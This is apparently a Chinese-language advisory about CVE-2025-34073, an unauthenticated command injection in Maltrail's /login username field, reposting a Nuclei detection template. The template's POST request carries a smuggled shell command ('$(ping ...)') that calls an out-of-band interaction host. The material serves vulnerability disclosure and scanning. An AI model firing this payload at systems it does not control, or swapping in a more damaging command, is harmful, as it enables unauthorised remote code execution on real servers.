Maltrail 远程命令执行漏洞

漏洞信息

漏洞名称: Maltrail 远程命令执行漏洞

漏洞编号:

  • CVE: CVE-2025-34073

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Maltrail是一款开源的恶意流量检测系统,广泛用于网络安全领域,能够帮助用户识别和阻断恶意网络流量。该系统通常部署在企业网络边界或内部关键节点,以监控和分析网络流量。由于其在网络安全中的重要作用,Maltrail的漏洞可能会对企业的安全防护造成严重影响。该漏洞存在于Maltrail的登录功能中,具体为/login端点的username参数。由于未对用户输入进行充分的验证和过滤,攻击者可以通过构造恶意的username参数,注入并执行任意命令。这种漏洞的根源在于输入验证不足,导致攻击者能够利用系统命令执行功能。此漏洞的严重性在于它允许未经身份验证的攻击者远程执行命令,可能导致服务器被完全控制,数据泄露,或服务中断。由于无需认证即可利用,且可以自动化攻击,这使得漏洞的风险进一步加大。

产品名称: Maltrail

影响版本: <= 0.53

来源: https://github.com/projectdiscovery/nuclei-templates/blob/7d53855fea5b8722f34d7c9a75eae0c7904b6d50/http%2Fcves%2F2025%2FCVE-2025-34073.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

id: cve-2025-34073

info:
name: Maltrail RCE via username logger injection
author: SeungAh-Hong
severity: critical
description: |
Maltrail <= 0.53 allows unauthenticated remote command injection via the `username` parameter at the `/login` endpoint.
tags: cve, maltrail, rce, command-injection, unauth

requests:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

username=;$(ping -c 1 {{interactsh-url}})

matchers:
- type: dsl
dsl:
- interactsh_protocol == "dns"




Maltrail 远程命令执行漏洞
http://example.com/2025/08/04/github_4071579193/
作者
lianccc
发布于
2025年8月4日
许可协议